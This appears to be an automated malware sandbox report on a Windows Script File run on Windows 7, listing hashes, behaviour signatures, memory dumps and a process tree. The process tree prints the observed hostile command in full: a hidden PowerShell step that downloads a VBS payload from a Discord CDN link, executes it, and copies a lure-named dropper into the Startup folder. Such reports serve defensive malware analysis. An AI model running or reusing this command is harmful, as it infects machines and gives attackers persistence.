Resubmissions

10/10/2022, 20:23

221010-y6fc6sdcdk 10

04/10/2022, 21:00

221004-ztcl7aced4 8

Analysis

  • max time kernel
    64s
  • max time network
    39s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    10/10/2022, 20:23

General

  • Target

    0f35bfed5b1817310378a5df58ca5fcd.wsf

  • Size

    84KB

  • MD5

    0f35bfed5b1817310378a5df58ca5fcd

  • SHA1

    3062b699b4944f3e70ee80127fe760a68fb3f453

  • SHA256

    bc07c50c0b92825bf9436f7a6816bd86c54f827c00c87304b63ff67ee05e695d

  • SHA512

    c14007ae998ac0bfa7816f314e0c42919c820651e327eb67f6c182e2bd2b0aa2fdef64d6b7f7f51471e6f4903a4e632d354bed5a49ad5f411801857abfc3e9c0

  • SSDEEP

    48:4sLsLsLsLsLsLsLsLsLsLsLsLsLsLsLsLsLsLsLsLsLsLsLsLsLsLsLsLsLsLsLG:tiJZ

Score
3/10

Malware Config

Signatures

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
  • Modifies registry class 18 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\0f35bfed5b1817310378a5df58ca5fcd.wsf"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1488
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden wget 'https://cdn.discordapp.com/attachments/1024684238085312517/1026668711156928603/Crpted.vbs' -o C:\Windows\Temp\nLeNPdi.vbs;explorer.exe C:\Windows\Temp\nLeNPdi.vbs;Start-Sleep 3;[System.IO.File]::Copy('El presente es el requerimiento enviado a declarar por el proceso 0091-002018-0917875 .wsf','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\дссвПЙ.wsf');Start-Sleep 1;rm *.uue,*.pif
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1476
      • C:\Windows\explorer.exe
        "C:\Windows\explorer.exe" C:\Windows\Temp\nLeNPdi.vbs
        3⤵
          PID:1512
    • C:\Windows\explorer.exe
      C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
      1⤵
      • Modifies Internet Explorer settings
      • Modifies registry class
      PID:1080

    Network

          MITRE ATT&CK Enterprise v6

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • memory/1080-63-0x0000000003A00000-0x0000000003A10000-memory.dmp

            Filesize

            64KB

          • memory/1476-57-0x000007FEF4640000-0x000007FEF5063000-memory.dmp

            Filesize

            10.1MB

          • memory/1476-58-0x000007FEF38F0000-0x000007FEF444D000-memory.dmp

            Filesize

            11.4MB

          • memory/1476-59-0x0000000002514000-0x0000000002517000-memory.dmp

            Filesize

            12KB

          • memory/1476-64-0x000000000251B000-0x000000000253A000-memory.dmp

            Filesize

            124KB

          • memory/1476-65-0x0000000002514000-0x0000000002517000-memory.dmp

            Filesize

            12KB

          • memory/1476-66-0x000000000251B000-0x000000000253A000-memory.dmp

            Filesize

            124KB

          • memory/1488-54-0x000007FEFC001000-0x000007FEFC003000-memory.dmp

            Filesize

            8KB